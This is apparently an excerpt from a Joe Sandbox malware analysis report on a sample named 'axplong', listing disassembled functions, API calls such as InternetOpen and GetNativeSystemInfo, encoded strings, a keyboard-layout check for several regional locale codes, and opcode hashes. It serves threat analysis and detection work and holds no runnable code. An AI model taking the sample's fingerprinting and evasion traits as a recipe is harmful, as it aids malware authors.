Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1000000_axplong.jbxd

Yara matches

Similarity

API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
String ID: R2Z$ SBZ$ wNZ$246122658369$9LFZ$Gl==$LrTsKE==$NvB+$NvF+$WMNZ$WMxZ$Wb Z$XvPZ$a9P=$aRFZ$aSF2aA==$avBZ$bLTZ$bcBZ$e76b71$stoi argument out of range
API String ID: 2414744145-383584070
Opcode ID: 0473a49296d78cbed02c07c98d3ebaa8b387a1d98621e01d14479870deb9cc3b
Instruction ID: f69b19ea7bf4d4f1a048d1efb10da924202c075187e14ba7893b58e4f50f9d57
Opcode Fuzzy Hash: 0473a49296d78cbed02c07c98d3ebaa8b387a1d98621e01d14479870deb9cc3b
Instruction Fuzzy Hash: 122326719002488BEB19DB28CD887DDBB76AF91304F5481DCD089AB2D9DB7A9F84CF51

Function 01005DD0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0000043f, xrefs: 0100601B
Keyboard Layout\Preload, xrefs: 01005F44
00000423, xrefs: 01005FEA
00000419, xrefs: 01005F88
00000422, xrefs: 01005FB9

Memory Dump Source

Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true

Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1000000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 3ab784688ad618d4213c2e887cccbe76d47c627edcf055debd123eeaba5a7bd9
Instruction ID: 63f36b9f5dedba294ce5db34150195d51e76c51e2513bcd473afa86c66906b0e
Opcode Fuzzy Hash: 3ab784688ad618d4213c2e887cccbe76d47c627edcf055debd123eeaba5a7bd9
Instruction Fuzzy Hash: 82E1CC71900218AFEB25DBA4CC8CBDEBBBAEB14300F5042D9E548A7291DB759BC4CF51

Function 01007CE0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01007E83

Strings

K9pqMU==, xrefs: 01008042
K9pqLk==, xrefs: 01008192
K9prKk==, xrefs: 010080EA

Memory Dump Source

Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true

Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1000000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: K9pqLk==$K9pqMU==$K9prKk==
API String ID: 1721193555-747669196
Opcode ID: c30acca61b7f8021d5ccdf9c17d29d8f052f905a4e011bdba4ceadb9b352b393
Instruction ID: 63e00c9fdc786001879745dd347b44e8bb192c52e739c714a15ff8efe6988b47
Opcode Fuzzy Hash: c30acca61b7f8021d5ccdf9c17d29d8f052f905a4e011bdba4ceadb9b352b393
Instruction Fuzzy Hash: 56D12870E006459BEB25BB28DC4A3DE7B71AB86320F9442CDD4C56B3C1DB795E818BD2

Function 01036DE1 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 01036E03
GetFileInformationByHandle.KERNELBASE(?,?), ref: 01036E5D
__dosmaperr.LIBCMT ref: 01036EF2

Part of subcall function 01037157: __dosmaperr.LIBCMT ref: 0103718C

Memory Dump Source

Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true

Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1000000_axplong.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID:
API String ID: 2531987475-0
Opcode ID: 60b8527b9b1e89bd3c8a6dad29f3d9df9181e599e4305ffe076c029f28c28417
Instruction ID: 42d44e8f4f0a6f58bff76c28a945dcd5bd22f8c7ad1875c74d6e9442e1fb7ba7
Opcode Fuzzy Hash: 60b8527b9b1e89bd3c8a6dad29f3d9df9181e599e4305ffe076c029f28c28417
Instruction Fuzzy Hash: 48413CB5901245AFDB24EFB5D8459AFBBFDEF89300B10442DE996D3610EB32E904CB61

Function 0103D4D4 Relevance: 1.7, APIs: 1, Instructions: 198
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true

Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1000000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88c0ed3c6937f75ac97d4489276b017266130c39aac2ad2bf8d3b6a8252afa25
Instruction ID: bf580ea0ef0ac4694253749dbf92319759f2e4148cc6e6400fb132cca9c81f0e
Opcode Fuzzy Hash: 88c0ed3c6937f75ac97d4489276b017266130c39aac2ad2bf8d3b6a8252afa25
Instruction Fuzzy Hash: C061F272D002158FEF66AFECD4846EDBBF8BBD9314F94419AD4D9AB290D7318800CB50

Function 01008290 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?), ref: 01008434

Memory Dump Source

Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true

Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1000000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: b093b05ea848897f52cf857895365a3c0f3f05fe0727e1d99e324200b58bc5b7
Instruction ID: c62c0257e550a965e8e9397b3b177b32742301403915e6c87a1c485da950363c
Opcode Fuzzy Hash: b093b05ea848897f52cf857895365a3c0f3f05fe0727e1d99e324200b58bc5b7
Instruction Fuzzy Hash: 22512870D002089BFB15EB78CD487DEBB75EB45314F5082ADE988A72D1EF359A84CB91

Function 01036C79 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true

Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1000000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 391a1c081862db805256c189c508b54f32cee1940f923eaf99ef56ddc3bbb833
Instruction ID: 19419e3b44ede1a9f1012a4a1632c535c76f5e9247196facf0f5915c54f1308f
Opcode Fuzzy Hash: 391a1c081862db805256c189c508b54f32cee1940f923eaf99ef56ddc3bbb833
Instruction Fuzzy Hash: 9D21F872D01109BAEB117B68AC44BEE3B6DDF82338F200354F9A42B1D0DB716F4586A1

Function 01036F51 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 01036F93

Memory Dump Source

Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true

Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1000000_axplong.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: 016c259adef601f7ddcc95d925994b515daeb33cbcfe82da7819be13101c58c5
Instruction ID: 7b21821ea2a19dfcd6cdd21e85232fb28383e53d53b08601973df84c132b5574
Opcode Fuzzy Hash: 016c259adef601f7ddcc95d925994b515daeb33cbcfe82da7819be13101c58c5
Instruction Fuzzy Hash: 49111CB290010DBFDB10DE95C944EDFB7FCAB48320F504266E551E6190EB31EB48CB61

Function 0103D6CF Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,0103A5CD,?,0103748E,?,00000000,?), ref: 0103D711

Memory Dump Source

Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true

Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1000000_axplong.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 33c51d5a1b928d3fb5f03be66c63af80a28c6ba9cc2b91a9e3746ff5d8bc8966
Instruction ID: b4e7874790b859dedb75e1414371a3a9b8a4f3aa0eb27fa7bd9eeb12102774be
Opcode Fuzzy Hash: 33c51d5a1b928d3fb5f03be66c63af80a28c6ba9cc2b91a9e3746ff5d8bc8966
Instruction Fuzzy Hash: 15F0E23150526566AB622AEA9C01A9BBFDDFFD5270B488552FDC89A181EB30D40043E0

Function 01016AB0 Relevance: 1.3, APIs: 1, Instructions: 40
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE ref: 01016B35

Memory Dump Source

Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true

Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1000000_axplong.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 0a40faeb843f6deaf25a7f866e528054822f6dc8ad756a5577857f365c66a76e
Instruction ID: 920a9dbd48977c76753711302a7440203c0ab3abf5ddc76149627fd5d090783a
Opcode Fuzzy Hash: 0a40faeb843f6deaf25a7f866e528054822f6dc8ad756a5577857f365c66a76e
Instruction Fuzzy Hash: 41F02871E40605EBC710BB69CD0674FBB78EB12A60F80039CE8916B3D9DB7929008BD3

Function 05740C54 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4117219081.0000000005740000.00000040.00001000.00020000.00000000.sdmp, Offset: 05740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5740000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7499450f3e7be96d82bd794de61cbaf40951ccac8e51541a75ad80feb08de835
Instruction ID: 70cb27e7c9f4070e596880b6e055c49af0e3c3c77580deb0b4b2bfbbebc31ee6
Opcode Fuzzy Hash: 7499450f3e7be96d82bd794de61cbaf40951ccac8e51541a75ad80feb08de835
Instruction Fuzzy Hash: 21C08CA7248028D91080908AB80DDFA638DE4922B33500133F302C94808605080ABA71

Non-executed Functions

Function 0100E410 Relevance: 13.5, Strings: 10, Instructions: 1000COMMON

Download Yara Rule

Strings

XIt=, xrefs: 0101085D
246122658369, xrefs: 0100F617, 0100F8F4, 010104C7, 0101087A
Vp==, xrefs: 0100E9EF, 0100EC36
e76b71, xrefs: 0100FA6E
HcKn91KZ, xrefs: 0100E44F
Xst=, xrefs: 0100F5FD, 0100F8DA
111, xrefs: 0100F680
XIp=, xrefs: 010104AA
NvB+, xrefs: 0100E704
NF==, xrefs: 0100E475

Memory Dump Source

Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true

Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1000000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 111$246122658369$HcKn91KZ$NF==$NvB+$Vp==$XIp=$XIt=$Xst=$e76b71
API String ID: 0-788600999
Opcode ID: dc0556e0ff5400344326f583ad7d704a590e9f29a113065d4bf7c5221aa3701d
Instruction ID: 2b910c92b87479256b765a02ff5f50e6fe61ab28a7ff5fa99e9fab6dcae296bc
Opcode Fuzzy Hash: dc0556e0ff5400344326f583ad7d704a590e9f29a113065d4bf7c5221aa3701d
Instruction Fuzzy Hash: 76820670900249DBEF15EF68C9497CE7FB6AF55304F508188E8856B3C5C7B99A84CBD2

Function 01043048 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 010431C3

Strings

1#QNAN, xrefs: 01044361
1#SNAN, xrefs: 0104435A
1#IND, xrefs: 01044353
1#INF, xrefs: 0104437E

Memory Dump Source

Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true

Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1000000_axplong.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 9301fa2cb9bfbb76db22b6f551bd5cacb1bebb1de286640dabc079fefe5abd10
Instruction ID: 092fa4816ee8e09912be056b58b4532c5a7f18d293987f12fd1f278a4f1b0157
Opcode Fuzzy Hash: 9301fa2cb9bfbb76db22b6f551bd5cacb1bebb1de286640dabc079fefe5abd10
Instruction Fuzzy Hash: 3BC23AB1E046298FDB65CE288D807EAB7F5FB84305F1451EAD98DE7240E775AE818F40

Function 01042BB0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true

Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1000000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction ID: 8ccd9caae4f10535fd10eec54149edadbd12d326495cfa54b9fd9f7d4a81ef4f
Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction Fuzzy Hash: 08F16EB1E002199FDF14CFA9D8C06ADBBF1FF88314F1582A9E959AB345D731A901CB90

Function 0101CAED Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,0101CE55,?,?,?,?,0101CE8A,?,?,?,?,?,?,0101C400,?,00000001), ref: 0101CB06

Memory Dump Source

Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true

Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
